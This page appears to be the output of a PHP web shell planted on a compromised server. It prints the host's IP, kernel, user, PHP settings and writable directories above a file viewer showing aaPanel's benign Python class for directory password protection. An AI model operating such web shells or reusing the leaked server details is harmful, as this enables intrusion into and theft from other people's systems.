403Webshell
Server IP : 104.21.38.3  /  Your IP : 162.158.88.162
Web Server : Apache
System : Linux krdc-ubuntu-s-2vcpu-4gb-amd-blr1-01.localdomain 5.15.0-142-generic #152-Ubuntu SMP Mon May 19 10:54:31 UTC 2025 x86_64
User : www ( 1000)
PHP Version : 7.4.33
Disable Function : passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /www/server/panel/class_v2/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /www/server/panel/class_v2/site_dir_auth_v2.py
#coding: utf-8
#-------------------------------------------------------------------
# aaPanel
#-------------------------------------------------------------------
# Copyright (c) 2015-2017 aaPanel(www.aapanel.com) All rights reserved.
#-------------------------------------------------------------------
# Author: zhwen <[email protected]>
#-------------------------------------------------------------------

#------------------------------
# Site directory password protection
#------------------------------
import public,re,os,json,shutil
from public.validate import Param

class SiteDirAuth:
    # Resolve the panel paths used by directory password protection
    def __init__(self):
        """Record the panel install root and the path of the JSON rule store."""
        install_root = public.GetConfigValue('setup_path')
        self.setup_path = install_root
        self.conf_file = install_root + "/panel/data/site_dir_auth.json"
    # Read the stored directory-protection rules
    def _read_conf(self):
        """
        Load the directory-protection rule store from ``self.conf_file``.

        :return: the parsed JSON object. When ``public.readFile`` returns a
                 falsy value, the content is not valid JSON, or the content
                 is not a JSON object, the file is rewritten as ``{}`` and
                 an empty dict is returned.
        """
        raw = public.readFile(self.conf_file)
        if raw:
            try:
                parsed = json.loads(raw)
            except (TypeError, ValueError):
                # JSONDecodeError is a ValueError; TypeError covers content
                # that is not text. Either way the store is reset below.
                parsed = None
            if isinstance(parsed, dict):
                return parsed
        # Single reset path for every "unusable store" case.
        empty = {}
        public.writeFile(self.conf_file, json.dumps(empty))
        return empty

    def _write_conf(self,conf,site_name):
        """
        Append one rule to a site's rule list and persist the whole store.

        :param conf: rule dict to add
        :param site_name: key of the site the rule belongs to
        """
        store = self._read_conf()
        # Creates the site's list on first use, otherwise extends it.
        store.setdefault(site_name, []).append(conf)
        public.writeFile(self.conf_file, json.dumps(store))

    def _check_site_authorization(self,site_name):
        """
        Tell whether the site's main vhost file for the active web server
        contains the text "Authorization".

        :param site_name: site whose vhost file is inspected
        :return: True when the text is present, otherwise False (including
                 when the vhost file cannot be read)
        """
        webserver = public.get_webserver()
        conf_file = "{setup_path}/panel/vhost/{webserver}/{site_name}.conf".format(
                setup_path=self.setup_path, site_name=site_name, webserver=webserver)
        conf = public.readFile(conf_file)
        # readFile can hand back a falsy non-string; "x in <that>" would raise.
        if not conf:
            return False
        return "Authorization" in conf


    # Create a directory password-protection rule
    def set_dir_auth(self,get):
        '''
        Create a password-protection rule for one directory of a site.

        get.name        rule name
        get.site_dir    directory to protect
        get.username    login user name
        get.password    login password
        get.id          site id
        :param get: request object carrying the fields above
        :return: result of public.return_message(...)
        '''
        # Validate request parameters
        try:
            get.validate([
                Param('site_dir').String(),
                Param('name').String(),
                Param('username').String(),
                Param('password').String(),
                Param('id').Integer(),
            ], [
                public.validate.trim_filter(),
            ])
        except Exception as ex:
            public.print_log("error info: {}".format(ex))
            return public.return_message(-1, 0, str(ex))

        checked = self.__check_param(get)
        if checked['status'] == -1:
            return checked
        fields = checked['message']
        password = fields['password']
        username = fields['username']
        name = fields['name']
        site_dir = get.site_dir

        # Guard clauses: unsupported server and missing inputs
        if public.get_webserver() == "openlitespeed":
            return public.return_message(-1, 0, public.lang("OpenLiteSpeed is currently not supported"))
        if not site_dir:
            return public.return_message(-1, 0, public.lang("Please enter the directory to be protected"))
        if not get.name:
            return public.return_message(-1, 0, public.lang("Please enter the Name"))

        hashed = public.hasPwd(password)
        site_info = self.get_site_info(get.id)
        site_name = site_info["site_name"]
        if self._check_site_authorization(site_name):
            return public.return_message(-1, 0, public.lang("Site password protection has been set, please cancel and then set. Site directory --> Password access"))
        if self._check_dir_auth(site_name, name, site_dir):
            return public.return_message(-1, 0, public.lang("Directory has been protected"))

        # Store the credential line in <setup_path>/pass/<site>/<name>.pass
        credential = "{user}:{passwd}".format(user=username, passwd=hashed)
        pass_dir = '{setup_path}/pass/{site_name}'.format(setup_path=self.setup_path, site_name=site_name)
        if not os.path.exists(pass_dir):
            os.makedirs(pass_dir)
        auth_file = pass_dir + "/{}.pass".format(name)
        public.writeFile(auth_file, credential)

        # Write the per-rule snippet, then hook it into the site's main config
        self.set_dir_auth_file(site_info["site_path"], site_name, name, username, site_dir, auth_file)
        outcome = self.set_conf(site_name, "create")
        if outcome:
            return public.return_message(0, 0, outcome)

        # Validate the resulting web server configuration
        # NOTE(review): a failed check is returned with status 0 here while
        # other failures in this method use -1 -- confirm this is intended.
        outcome = self.check_site_conf(public.get_webserver(), site_name, name)
        if outcome:
            return public.return_message(0, 0, outcome)

        # Record the rule and reload the web server
        rule = {"name": name, "site_dir": site_dir, "auth_file": auth_file}
        self._write_conf(rule, site_name)
        public.serviceReload()
        return public.return_message(0, 0, public.lang("Successfully created"))

    # Check whether a matching rule already exists
    def _check_dir_auth(self, site_name, name,site_dir):
        conf = self._read_conf()
        if not conf:
            return False
        if site_name in conf:
            for i in conf[site_name]:
                if name in i.values() or site_dir == i["site_dir"]:
                    return True

    # Get the PHP version currently used by the site
    def get_site_php_version(self,siteName):
        """
        Extract the PHP version tag from the site's vhost file for the
        active web server.

        For nginx the tag is taken from an ``enable-php-<tag>.conf`` include
        (plain tag first, then the ``<digits>-wpfastcgi`` form); for any
        other server it is taken from a ``php-cgi-<tag>.sock`` reference.

        :param siteName: site whose vhost file is read
        :return: the matched tag as a string; when nothing matches or
                 reading fails, the result of public.return_msg_gettext(False, ...)
                 -- callers must not treat that value as a version string
        """
        try:
            webserver = public.get_webserver()
            conf = public.readFile(self.setup_path + '/panel/vhost/' + webserver + '/' + siteName + '.conf')
            if webserver == 'nginx':
                patterns = (
                    r"enable-php-(\w{2,5})\.conf",
                    r"enable-php-(\d+-wpfastcgi)\.conf",
                )
            else:
                patterns = (r"php-cgi-(\w{2,5})\.sock",)
            for pattern in patterns:
                found = re.search(pattern, conf)
                if found:
                    return found.group(1)
        except Exception:
            # e.g. the vhost file could not be read as text; reported below
            # exactly like "no version found".
            pass
        return public.return_msg_gettext(False, public.lang("Apache2.2 does NOT support MultiPHP!"))

    # Get the site name and root path
    def get_site_info(self,id):
        """
        Look up one row of the ``sites`` table by id.

        :param id: site id
        :return: dict with ``site_name`` and ``site_path`` taken from the
                 row's ``name`` and ``path`` fields
        """
        row = public.M('sites').where('id=?', (id,)).field('name,path').find()
        site_name, site_path = row["name"], row["path"]
        return {"site_name": site_name, "site_path": site_path}

    def change_dir_auth_file_nginx_phpver(self,site_name,phpv,auth_name):
        """
        Point the PHP include of one nginx directory-protection snippet at a
        different PHP version.

        :param site_name: site the snippet belongs to
        :param phpv: new PHP version tag, or 'other' for the per-site
                     ``enable-php-other.conf``
        :param auth_name: rule name (snippet file name without ``.conf``)
        :return: False when the snippet cannot be read, otherwise None
        """
        file_path = "{setup_path}/panel/vhost/nginx/dir_auth/{site_name}/{auth_name}.conf".format(
            setup_path=self.setup_path,site_name=site_name,auth_name=auth_name)
        conf = public.readFile(file_path)
        if not conf:
            return False

        if phpv == 'other':
            php_conf = "include /www/server/panel/vhost/other_php/{}/enable-php-other.conf;".format(site_name)
        else:
            php_conf = 'include enable-php-{}.conf;'.format(phpv)

        # site_name is literal text (it normally contains dots), so escape it;
        # [\w-]+ also covers tags such as "74-wpfastcgi".
        rep = r"include\s+(enable-php-[\w-]+|/www/server/panel/vhost/other_php/{}/enable-php-other)\.conf;".format(
            re.escape(site_name))
        # A callable replacement keeps php_conf from being parsed as a
        # substitution template (backslashes / group references).
        conf = re.sub(rep, lambda _match: php_conf, conf)

        public.writeFile(file_path,conf)

    # Write the standalone per-rule auth snippets
    def set_dir_auth_file(self,site_path,site_name,name,username,site_dir,auth_file):
        php_ver = self.get_site_php_version(site_name)
        php_conf = ""
        if php_ver:
            if php_ver == 'other':
                php_conf = "include /www/server/panel/vhost/other_php/{}/enable-php-{}.conf;".format(site_name,php_ver)
            else:
                php_conf = "include enable-php-{}.conf;".format(php_ver)

        for i in ["nginx","apache"]:
            file_path = "{setup_path}/panel/vhost/{webserver}/dir_auth/{site_name}"
            if i == "nginx":
                # 设置nginx
                conf = '''location ~* ^%s* {
    #AUTH_START
    auth_basic "Authorization";
    auth_basic_user_file %s;
    %s
    #AUTH_END
}''' % (site_dir,auth_file,php_conf)
            else:
            # 设置apache
                conf = '''<Directory "{site_path}{site_dir}">
    #AUTH_START
    AuthType basic
    AuthName "Authorization "
    AuthUserFile {auth_file}
    Require user {username}
    #AUTH_END
    SetOutputFilter DEFLATE
    Options FollowSymLinks
    AllowOverride All
    #Require all granted
        DirectoryIndex index.php index.html index.htm default.php default.html default.htm
</Directory>'''.format(site_path=site_path,site_dir=site_dir,auth_file=auth_file,username=username,site_name=site_name)
            conf_file = file_path.format(setup_path=self.setup_path,site_name=site_name,webserver=i)
            if not os.path.exists(conf_file):
                os.makedirs(conf_file)
            conf_file = conf_file + '/{}.conf'.format(name)
            public.writeFile(conf_file,conf)

    # Add or remove the dir_auth include in the nginx and apache site configs
    def set_conf(self,site_name,act):
        """
        Add or remove the include of ``dir_auth/<site_name>/*.conf`` in the
        site's main nginx and apache vhost files.

        :param site_name: site whose vhost files are edited
        :param act: "create" inserts the include when it is not present yet;
                    any other value removes it
        :return: None
        """
        for i in ["nginx", "apache"]:
            dir_auth_file = "%s/panel/vhost/%s/dir_auth/%s/*.conf" % (self.setup_path,i,site_name,)
            vhost_file = self.setup_path + "/panel/vhost/{}/".format(i) + site_name + ".conf"
            # Skip a server that has no vhost file for this site; copying
            # before this check used to raise and abort the whole call.
            if not os.path.exists(vhost_file):
                continue
            # Backup copy before editing.
            # NOTE(review): fixed, shared /tmp name -- nothing in this class
            # reads it back; confirm whether it is still needed.
            shutil.copyfile(vhost_file, '/tmp/{}_file_bk.conf'.format(i))

            conf = public.readFile(vhost_file)
            if i == "apache":
                if act == "create":
                    rep = "IncludeOptional.*\\/dir_auth\\/.*conf(\n|.)+<\\/VirtualHost>"
                    rep1 = "</VirtualHost>"
                    if not re.search(rep, conf):
                        conf = conf.replace(rep1,
                                            "\n\t#Directory protection rules, do not manually delete\n\tIncludeOptional {}\n</VirtualHost>".format(
                                                dir_auth_file))
                else:
                    rep = "\n*#Directory protection rules, do not manually delete\n+\\s+IncludeOptional[\\s\\w\\/\\.\\*]+"
                    conf = re.sub(rep, '', conf)
            else:
                if act == "create":
                    rep = "#SSL-END(\n|.)+include.*\\/dir_auth\\/.*conf;"
                    rep1 = "#SSL-END"
                    if not re.search(rep,conf):
                        conf = conf.replace(rep1, rep1 + "\n\t#Directory protection rules, do not manually delete\n\tinclude {};".format(dir_auth_file))
                else:
                    rep = "\n*#Directory protection rules, do not manually delete\n+\\s+include[\\s\\w\\/\\.\\*]+;"
                    conf = re.sub(rep, '', conf)
            public.writeFile(vhost_file, conf)

    # Validate the web server configuration
    def check_site_conf(self,webserver,site_name,name):
        """
        Run the panel's web-config check and roll back the rule snippet on
        failure.

        :param webserver: server whose snippet is removed on failure
        :param site_name: site the rule belongs to
        :param name: rule name (snippet file name without ``.conf``)
        :return: None when the check passes; otherwise the result of
                 public.return_msg_gettext(False, ...) carrying the check output
        """
        check_result = public.checkWebConfig()
        snippet = "{setup_path}/panel/vhost/{webserver}/dir_auth/{site_name}/{name}.conf".format(
            setup_path=self.setup_path, webserver=webserver, site_name=site_name, name=name)
        if check_result == True:
            return None
        # The check failed: drop the snippet that was just written.
        os.remove(snippet)
        heading = 'ERROR: %s<br><a style="color:red;">' % public.lang("Configuration ERROR")
        detail = check_result.replace("\n", '<br>')
        return public.return_msg_gettext(False, public.lang(heading + detail + '</a>'))

    # Delete a directory password-protection rule
    def delete_dir_auth(self,get):
        '''
        Delete one directory-protection rule of a site.

        get.id      site id
        get.name    rule name
        get.multiple    optional; when present the web server reload is skipped
        :param get: request object carrying the fields above
        :return: result of public.return_message(...)
        '''
        try:
            get.validate([
                Param('name').String(),
                Param('id').Integer(),
            ], [
                public.validate.trim_filter(),
            ])
        except Exception as ex:
            public.print_log("error info: {}".format(ex))
            return public.return_message(-1, 0, str(ex))

        name = get.name
        # name is interpolated into paths that are removed below; refuse
        # anything that is not a plain file-name component.
        if not name or os.path.basename(name) != name:
            return public.return_message(-1, 0, public.lang("Name format must be [ aaa_bbb ]"))

        site_info = self.get_site_info(get.id)
        site_name = site_info["site_name"]
        conf = self._read_conf()
        if site_name not in conf:
            return public.return_message(-1,0,"The website does not exist in the configuration:{}",(site_name,))

        # Drop the first stored rule that carries this name.
        rules = conf[site_name]
        for index, rule in enumerate(rules):
            if name in rule.values():
                del rules[index]
                break
        if not rules:
            del conf[site_name]
        public.writeFile(self.conf_file,json.dumps(conf))

        # Remove the per-rule snippets and the credential file. A file that
        # is already gone must not abort the deletion half-way.
        stale_files = [
            "{setup_path}/panel/vhost/{webserver}/dir_auth/{site_name}/{name}.conf".format(
                webserver=webserver, setup_path=self.setup_path, site_name=site_name, name=name)
            for webserver in ("nginx", "apache")
        ]
        stale_files.append('{setup_path}/pass/{site_name}/{name}.pass'.format(
            setup_path=self.setup_path, site_name=site_name, name=name))
        for file_path in stale_files:
            if os.path.exists(file_path):
                os.remove(file_path)

        # Strip the include from the site's main config once this site (not
        # the whole store) has no rules left.
        if site_name not in conf:
            self.set_conf(site_name,"delete")
        if not hasattr(get,'multiple'):
            public.serviceReload()
        return public.return_message(0, 0, public.lang("Successfully deleted!"))

    # Change the credentials of a directory-protection rule
    def modify_dir_auth_pass(self,get):
        '''
        Replace the user name / password of an existing rule.

        get.id          site id
        get.name        rule name
        get.username    new login user name
        get.password    new login password
        :param get: request object carrying the fields above
        :return: result of public.return_message(...)
        '''
        # Validate request parameters
        try:
            get.validate([
                Param('name').String(),
                Param('username').String(),
                Param('password').String(),
                Param('id').Integer(),

            ], [
                public.validate.trim_filter(),
            ])
        except Exception as ex:
            public.print_log("error info: {}".format(ex))
            return public.return_message(-1, 0, str(ex))

        param = self.__check_param(get)
        if param['status']==-1:
            return param
        # Use the validated, stripped values (as set_dir_auth does) rather
        # than the raw request attributes.
        fields = param['message']
        password = fields['password']
        username = fields['username']
        name = fields['name']

        site_info = self.get_site_info(get.id)
        site_name = site_info["site_name"]
        passwd = public.hasPwd(password)
        auth = "{user}:{passwd}".format(user=username,passwd=passwd)
        auth_file = '{setup_path}/pass/{site_name}/{name}.pass'.format(setup_path=self.setup_path,site_name=site_name,name=name)
        public.writeFile(auth_file,auth)

        # The apache snippet written by set_dir_auth_file pins the login with
        # "Require user <username>"; keep it in step with the password file,
        # otherwise a changed user name is refused by apache.
        apache_snippet = "{setup_path}/panel/vhost/apache/dir_auth/{site_name}/{name}.conf".format(
            setup_path=self.setup_path,site_name=site_name,name=name)
        apache_conf = public.readFile(apache_snippet)
        if apache_conf:
            synced = re.sub(r"(?m)^([ \t]*Require user[ \t]+).*$",
                            lambda found: found.group(1) + username,
                            apache_conf)
            if synced != apache_conf:
                public.writeFile(apache_snippet, synced)

        public.serviceReload()
        return public.return_message(0, 0, public.lang("Setup successfully!"))

    # List the directory-protection rules of a site
    def get_dir_auth(self,get):
        '''
        Return the stored rules of one site.

        get.id          site id, used to look up the site name
        get.siteName    optional; when present it is used as the site name
        :param get: request object carrying the fields above
        :return: public.return_message(0, 0, {site_name: rules}), or an empty
                 dict payload when the site has no stored rules
        '''
        # Validate request parameters
        try:
            get.validate([
                Param('id').Integer(),

            ], [
                public.validate.trim_filter(),
            ])
        except Exception as ex:
            public.print_log("error info: {}".format(ex))
            return public.return_message(-1, 0, str(ex))

        if hasattr(get, 'siteName'):
            site_name = get.siteName
        else:
            site_name = self.get_site_info(get.id)["site_name"]

        store = self._read_conf()
        payload = {site_name: store[site_name]} if site_name in store else {}
        return public.return_message(0,0,payload)

    def __check_param(self, get):
        """
        Validate whichever of ``password``, ``username`` and ``name`` are
        present on the request.

        Each present field must be non-empty, at least 3 characters after
        stripping, and free of whitespace; ``name`` must additionally
        contain none of the rejected punctuation characters.

        :param get: request object
        :return: public.return_message(-1, 0, <error text>) for the first
                 failing check, otherwise public.return_message(0, 0, values)
                 where values maps each present field to its stripped value
        """
        # (field, empty message, too-short message, whitespace message),
        # checked in this order.
        checks = (
            ("password", "Please enter password!",
             "Password cannot be less than 3 characters", "Password cannot contain spaces"),
            ("username", "Please enter username!",
             "Username cannot be less than 3 characters", "Username cannot contain spaces"),
            ("name", "Please enter a name!",
             "Name cannot be less than 3 characters", "Name cannot contain spaces"),
        )
        rejected_in_name = '[\\/\"\'\\!@#$%^&*()+={}\\[\\]\\:\\;\\?><,./\\\\]+'

        values = {}
        for field, empty_msg, short_msg, space_msg in checks:
            if not hasattr(get, field):
                continue
            supplied = getattr(get, field)
            if not supplied:
                return public.return_message(-1, 0, public.lang(empty_msg))
            cleaned = supplied.strip()
            if len(cleaned) < 3:
                return public.return_message(-1, 0, public.lang(short_msg))
            if re.search(r'\s', cleaned):
                return public.return_message(-1, 0, public.lang(space_msg))
            if field == "name" and re.search(rejected_in_name, cleaned):
                return public.return_message(-1, 0, public.lang("Name format must be [ aaa_bbb ]"))
            values[field] = cleaned

        return public.return_message(0,0, values)

Youez - 2016 - github.com/yon3zu
LinuXploit